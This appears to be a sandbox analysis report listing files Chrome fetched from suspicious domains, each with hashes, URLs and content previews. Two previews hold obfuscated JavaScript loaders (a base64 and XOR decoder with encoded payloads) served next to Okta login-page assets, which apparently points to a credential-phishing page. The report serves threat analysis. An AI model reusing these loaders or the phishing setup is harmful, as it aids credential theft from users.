                                                        Preview:<script>..function GHhyfCPtFf(wFkSxXfuQJ, TDeFPEGTcQ) {..let COKJKXgBMM = '';..wFkSxXfuQJ = atob(wFkSxXfuQJ);..let OEtQfoHvpw = TDeFPEGTcQ.length;..for (let i = 0; i < wFkSxXfuQJ.length; i++) {.. COKJKXgBMM += String.fromCharCode(wFkSxXfuQJ.charCodeAt(i) ^ TDeFPEGTcQ.charCodeAt(i % OEtQfoHvpw));..}..return COKJKXgBMM;..}..var pxtZibjyDX = GHhyfCPtFf(`bRQrGRcVbTgOZTlBAjpqTD5UIzE8WU86NS9TVWkgPxdRW159XA0qIW84ZXZ0YRRUOCYjXB8idDJGC3ZnOUEbJid7G0coKjVQQTwlNFEaMmsyWgJ5PjBBDTk8fAZBYHpxGgUiK39fHHRqfRsbKDc4RRtoWUsUSGtlbUYMJD0xQEg4NzIITT4gNUQbcWp+Vgs4ejJbCyAgJRsGOXt1Gl5ldX5GADU/JEBGIip/WAY4eitHSnV5fkYMJD0xQFZGT3EVT3ZoMlcaIjUlFRwkN3wWAD8xIUZVeXsmXRwjMDMbDDk5blINJTF+Rw44MCRMGGUvIhodMzgkVRsuNn5RACE6LVsJL2onBUFienIbGiorNVAXJnosXQZlLyIXUWp7MlcaIjUlC2JcdGEUSHc2MkcGJiBhRxooeHNdGyIkMg5HZCY1WwUleiJYBz4hN1kOJDFvVwcmajBfDi57LV0KOGoyRxYmIC4ZAjhqZRteeGVuVxoyNSVaQjwnb1kBJWs7Rk1oaG5HCzksIUFRW15hFEhreSJWHT8kNRQbOSZsFwciIDFHUmRqJkIYeDMuWw8nIH9WADt7M1ELKjUlVgc3eyBEAWUvIhdRansyVxoiNSULYlx0YRRIdyk4WwR2JiRYVWk2JUwD
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:downloaded
                                                        Size (bytes):268
                                                        Entropy (8bit):5.111190711619041
                                                        Encrypted:false
                                                        SSDEEP:6:tI9mc4slztdbC/yXqRRnYdbyJA0xy+LUxh7JECWWNAc:t4pb8WuEbaA0xVUxh1ECgc
                                                        MD5:59759B80E24A89C8CD029B14700E646D
                                                        SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                        SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                        SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rfwai.elixir85.com/rs3DhQgZj5jQkQBct28ombhTCAHmieGU0ouxgh9zt47ITiP0AvmihR1tBef200
                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:very short file (no magic)
                                                        Category:downloaded
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:V:V
                                                        MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                        SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                        SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                        SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://zichd.6gniu68.ru/dbXLDQtpDSRBuBhVOTWKwXxoBYwUSJTUEAPHETTNOFYTDAHVOKJURMWUFLQPVMBESXVOSRVBAFBDN
                                                        Preview:0
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (10450)
                                                        Category:downloaded
                                                        Size (bytes):10498
                                                        Entropy (8bit):5.327380141461276
                                                        Encrypted:false
                                                        SSDEEP:192:x9iW+rIadfLTcaTO5BrwjnwSrQ1kPmqQmMjmtmumobU8:x9KVLbw6jqON
                                                        MD5:E0D37A504604EF874BAD26435D62011F
                                                        SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                        SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                                        SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                        Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):10796
                                                        Entropy (8bit):7.946024875001343
                                                        Encrypted:false
                                                        SSDEEP:192:aPzBBDKs07GiH528urXXSjD4/voR3Euri/in9Q28oLaIAQLdCYXQIDeoIdv60:aPVBQ7P5nIyjD+oRnr4inJdANuGdC0
                                                        MD5:12BDACC832185D0367ECC23FD24C86CE
                                                        SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                        SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                        SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
                                                        Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):49602
                                                        Entropy (8bit):7.881935507115631
                                                        Encrypted:false
                                                        SSDEEP:768:eKE36up1D3cLJg7zmjprNBQqJCoklwCeFrpKZ00PIwoftXEsQsV1kZ8IHml446Xe:KqupJ9+aqyqCz+0ALcmDIHnjL2p
                                                        MD5:DB783743CD246FF4D77F4A3694285989
                                                        SHA1:B9466716904457641B7831868B47162D8D378D41
                                                        SHA-256:5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
                                                        SHA-512:E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR...p..........{......sBIT....|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..*MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T....*.(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@*B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ*..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (636)
                                                        Category:downloaded
                                                        Size (bytes):546598
                                                        Entropy (8bit):5.708515975651759
                                                        Encrypted:false
                                                        SSDEEP:6144:yihcR5I9BggP9ZSmsOjitOxTIuAFBZv51aLyOWNfsjj+LBH:y8MIAgxT0F3Bc/Y
                                                        MD5:93E3F7248853EA26232278A54613F93C
                                                        SHA1:16100C397972A415BFCFCE1A470ACAD68C173375
                                                        SHA-256:0EC782544506A0AEA967EA044659C633E1EE735B79E5172CB263797CC5CEFE3A
                                                        SHA-512:26ACA30DE753823A247916A9418AA8BCE24059D80EC35AF6E1A08A6E931DCF3119E326EC7239A1F8F83439979F39460B1F74C1A6D448E2F0702E91F5AD081DF9
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.gstatic.com/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recaptcha__en.js
                                                        Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that contro
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text, with very long lines (1445), with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):1812
                                                        Entropy (8bit):6.025824049952342
                                                        Encrypted:false
                                                        SSDEEP:48:7IfKZ+G3QXiNjFQTour+DzvP+4Pu0Q540yOfRscoS:RFeQjyKnP+4PrQ54V4oS
                                                        MD5:F2394FFC6092BAD0B6CB94750548BFB6
                                                        SHA1:A0D836A0D3B554A1AE3D0D13F93E46AAD202907B
                                                        SHA-256:63B77F7646DE9C4C58FA77DEE3E77BCC7683C03644375F6EBEC39AAC62C954D9
                                                        SHA-512:69A868134B5B46B457ED7E9213AA1D48224CDE0033A876C7DAFCBB09E94FBA95F90AC3DFD4FF3C6A25DD47888A7C0BCEAD3894A67FB0648C240A49C39E30930B
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rfwai.elixir85.com/RfWAi/
                                                        Preview:<script>..function ZrAmwvvBoR(PGGmgAHVoU, fJXDDsGwtv) {..let PWSLiYyEaZ = '';..PGGmgAHVoU = atob(PGGmgAHVoU);..let PmPQNBbtvK = fJXDDsGwtv.length;..for (let i = 0; i < PGGmgAHVoU.length; i++) {.. PWSLiYyEaZ += String.fromCharCode(PGGmgAHVoU.charCodeAt(i) ^ fJXDDsGwtv.charCodeAt(i % PmPQNBbtvK));..}..return PWSLiYyEaZ;..}..var UipFboIPyT = ZrAmwvvBoR(`QEZNQFQ8MTY3VEBGB1JFbh0WBhMYAz1jQgZ4e2MdJCIVXEBgNCkgCzklHl0ZJjk1K0Q+ORNAQzxwd2pRQEYXRlktLC8sBG0VOWtjPzATChwGZCFRdjsbNjEiATlYE0xDUmZjSm04A0oXNVVMY0ptbFETF24qIzcfPyJRUUMhOW4iHiIuWWNVDy0FMxgFAAQaHm5le2M6Lw0EcEc8EAo2UUBGURMXbiVmIAs5LxkTHysqNGpKNkF7ExdueGZjSm0+FEdCPDZmJQshPxQIOkR4ZmNKMEF7TjpEMSBrLx0JCGZ4AggzC0pwcVERFWcjS0lKbWxRRF4gPCk0RCEjElJDJzcobQI/KRcTCm4vLy0OIjtfX1gtOTIqBSNiAVJDJjYnLg9tZ1ERCGx4bWNIO25KPj0zVUwqDGUJIXZOGxcKEx8FbFAOCm56ZGoRQEZRExduMSBjQhQEKWdGJg0PNSFlCSF2ThsXChMfBWVYE0xDUmZjSm06EEEXKTQlEA4eAAlpXm5lZiIeIi5ZdmcLIRMMJh05ORoMQ1JmY0ptOhBBFyAVMDQtAh0lRnZuZWZrDSEvIldkAiAcKkQgLQVQX2Z3bhg2OmJcbhwOAyduEAxhKwMad3ZrHkERYipSGjQZaxlaYHUs
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):61
                                                        Entropy (8bit):3.990210155325004
                                                        Encrypted:false
                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:dropped
                                                        Size (bytes):270
                                                        Entropy (8bit):4.840496990713235
                                                        Encrypted:false
                                                        SSDEEP:6:tI9mc4slzIzUQYqRRn3u0xboUSWuUX8+TQMRAvY:t4uzEu3u0xUUluUs+TQMRAQ
                                                        MD5:40EB39126300B56BF66C20EE75B54093
                                                        SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                        SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                        SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                        Category:downloaded
                                                        Size (bytes):43596
                                                        Entropy (8bit):7.9952701440723475
                                                        Encrypted:true
                                                        SSDEEP:768:b0nfc/3Osy1fo0tBBFF/GGXfN2ZHKTBUwL+BR49qCow3Z3HuvJ5+xXtTgXHk6/:b0fU3OdhFF/xNOoZc49ow3Z3HO+xX1mf
                                                        MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                        SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                        SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                        SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rfwai.elixir85.com/89U0IUXkEak2DXQHKMqxZiF121VeznpNcbYfab72
                                                        Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):61
                                                        Entropy (8bit):3.990210155325004
                                                        Encrypted:false
                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 41 x 52, 8-bit/color RGB, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):61
                                                        Entropy (8bit):4.068159130770306
                                                        Encrypted:false
                                                        SSDEEP:3:yionv//thPlERNjTHxl/k4E08up:6v/lhPyz7Tp
                                                        MD5:2F1D281894D5911FB8F1CFCFFF9212BC
                                                        SHA1:261994270145AB28B493CFA769B87B5C89F61CCC
                                                        SHA-256:2ED25A4DDC517CD82CBB2E7BC918E93F7EFBEA7E790DB36745044DB991584E18
                                                        SHA-512:677451A5E983D31BCDDCA9CD1C1B2FA12B30EA0963CFFD618EFD294FDA917D7D3241FE1D164F99792A47A6B2D71190B60E9C2552D61F726D26ABAD9ABFC96DD4
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/89d927bb0859422d/1720033614003/48Eq3BNYqb_JyY1
                                                        Preview:.PNG........IHDR...)...4......J......IDAT.....$.....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65447)
                                                        Category:downloaded
                                                        Size (bytes):89501
                                                        Entropy (8bit):5.289893677458563
                                                        Encrypted:false
                                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (42690)
                                                        Category:downloaded
                                                        Size (bytes):42691
                                                        Entropy (8bit):5.373060430099094
                                                        Encrypted:false
                                                        SSDEEP:768:PCoL1znQzlLmx0isMILdD9dBvKBI886ifvO95QPcQ+aoh0aKoS4HRGU5KdF:XQzlyx0ipuvKBb95Q5
                                                        MD5:985094F1486391033426C17505182792
                                                        SHA1:D44FF6BEF2E3D9B2F6DEAA0170458B1AE39350D4
                                                        SHA-256:14B108C7F687C327D6AA759FD1D255A981D5D505B241B5B968B674E3BF50B2B9
                                                        SHA-512:D1A8015658A82AE64F2E93341B8CA15B0057DF298DF36ACB47188B330E0327CFE0392EE1FF94B9D3BE7BC7D689BDD536A86ADB873A7ADEDE10AE45AA9A9415DB
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://challenges.cloudflare.com/turnstile/v0/g/d2a97f6b6ec9/api.js
                                                        Preview:"use strict";(function(){function Et(e,a,r,o,c,u,g){try{var b=e[u](g),_=b.value}catch(l){r(l);return}b.done?a(_):Promise.resolve(_).then(o,c)}function wt(e){return function(){var a=this,r=arguments;return new Promise(function(o,c){var u=e.apply(a,r);function g(_){Et(u,o,c,g,b,"next",_)}function b(_){Et(u,o,c,g,b,"throw",_)}g(void 0)})}}function M(e,a){return a!=null&&typeof Symbol!="undefined"&&a[Symbol.hasInstance]?!!a[Symbol.hasInstance](e):M(e,a)}function Re(e,a,r){return a in e?Object.defineProperty(e,a,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[a]=r,e}function Be(e){for(var a=1;a<arguments.length;a++){var r=arguments[a]!=null?arguments[a]:{},o=Object.keys(r);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(r).filter(function(c){return Object.getOwnPropertyDescriptor(r,c).enumerable}))),o.forEach(function(c){Re(e,c,r[c])})}return e}function fr(e,a){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:dropped
                                                        Size (bytes):268
                                                        Entropy (8bit):5.111190711619041
                                                        Encrypted:false
                                                        SSDEEP:6:tI9mc4slztdbC/yXqRRnYdbyJA0xy+LUxh7JECWWNAc:t4pb8WuEbaA0xVUxh1ECgc
                                                        MD5:59759B80E24A89C8CD029B14700E646D
                                                        SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                        SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                        SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:downloaded
                                                        Size (bytes):763
                                                        Entropy (8bit):4.73890517681664
                                                        Encrypted:false
                                                        SSDEEP:12:f8+MHx14yOu/hz/zHoaNOU4/c/UddFB6MrYJmV4Mr2iWxmrE2AptAv9VVZ8BHA:k+mx14wxHoaNO38mV5r2ZmrE2sAv9OBg
                                                        MD5:3849201717DD51D96B654574CCED466A
                                                        SHA1:E24F74FECAB382E723EDA00292AA9EC36DC35EC0
                                                        SHA-256:842748142398582957A7231B1D55996C3036ECB3182289C2C0D48A387BB4DBCE
                                                        SHA-512:3153B3DC36715F41F7181E6F332EB4E7CBC60348C7025BE9AC5853FD175E8C72C941CA093D222B9F5AE8D56CDE0A913186FAAEB186E30258AF71F0492EB5DF89
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ipapi.co/8.46.123.33/json/
                                                        Preview:{. "ip": "8.46.123.33",. "network": "8.46.123.0/24",. "version": "IPv4",. "city": "New York City",. "region": "New York",. "region_code": "NY",. "country": "US",. "country_name": "United States",. "country_code": "US",. "country_code_iso3": "USA",. "country_capital": "Washington",. "country_tld": ".us",. "continent_code": "NA",. "in_eu": false,. "postal": "10069",. "latitude": 40.778,. "longitude": -73.9884,. "timezone": "America/New_York",. "utc_offset": "-0400",. "country_calling_code": "+1",. "currency": "USD",. "currency_name": "Dollar",. "languages": "en-US,es-US,haw,fr",. "country_area": 9629091.0,. "country_population": 327167434,. "asn": "AS3356",. "org": "LEVEL3".}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:V:V
                                                        MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                        SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                        SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                        SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:0
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):103933
                                                        Entropy (8bit):5.201385561091186
                                                        Encrypted:false
                                                        SSDEEP:3072:0CsKfdROH2DgBCO2acT8OcUa623RQs9UxIO:+S3IO
                                                        MD5:7BCC10882A3FEE621FCD4FF3CCE42AFA
                                                        SHA1:EDD5F4E27DB9BCA62499172114C24ED4E634E2C4
                                                        SHA-256:DB1F4FBD04BA255DDE2485CDA40B918F8286AD166F43BF7F1388EC7E7E52F1DD
